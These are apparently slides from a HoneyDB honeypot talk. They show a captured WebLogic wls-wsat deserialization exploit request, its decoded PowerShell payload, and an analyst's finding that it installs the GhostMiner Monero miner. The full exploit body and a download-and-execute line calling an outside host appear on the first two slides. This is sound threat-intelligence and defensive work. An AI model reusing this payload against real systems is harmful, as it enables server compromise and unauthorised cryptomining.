  • 69. HoneyDB - Examples... POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 64.137.163.142:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 Connection: Close Content-Type: text/xml Content-Length: 1216 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4 AcABoAHAAJwApADsA</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header>
  • 70. HoneyDB - Examples... $.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W .C.=.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s .e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0. .$.O.S.".).;.I.E.X. .$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9 ...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
  • 71. HoneyDB - @MalwareMechanic ● I analyzed the initial POST you sent me. From there was I was able to pull apart a scanner/worm/RAT! ● It appears to be GhostMiner to mine Monero!
  • 72. HoneyDB - Hmmmmm... $ cat GhostMiner >> HoneyMiner
  • 73. HoneyDB - No no no no...
  • 74. HoneyDB - @MalwareMechanic ● This POST utilizes a Java deserialization vulnerability to execute a base64 encoded PowerShell command. ● This in turn downloads and executes a PowerShell script (hxxp://123.59.68.172/Cache/DL.php). ● Installs a cryptominer via WMI. ● Attempts to stop the various services & tasks before installing the new miner. ● Attempts to stop other miners. ● Attempts to stop processes listening on specific ports. ● Also saw references to powershell_reflective_mimikatz.
  • 75. HoneyDB - Go Forth and Honeypot! honeydb.io Thanks! Questions?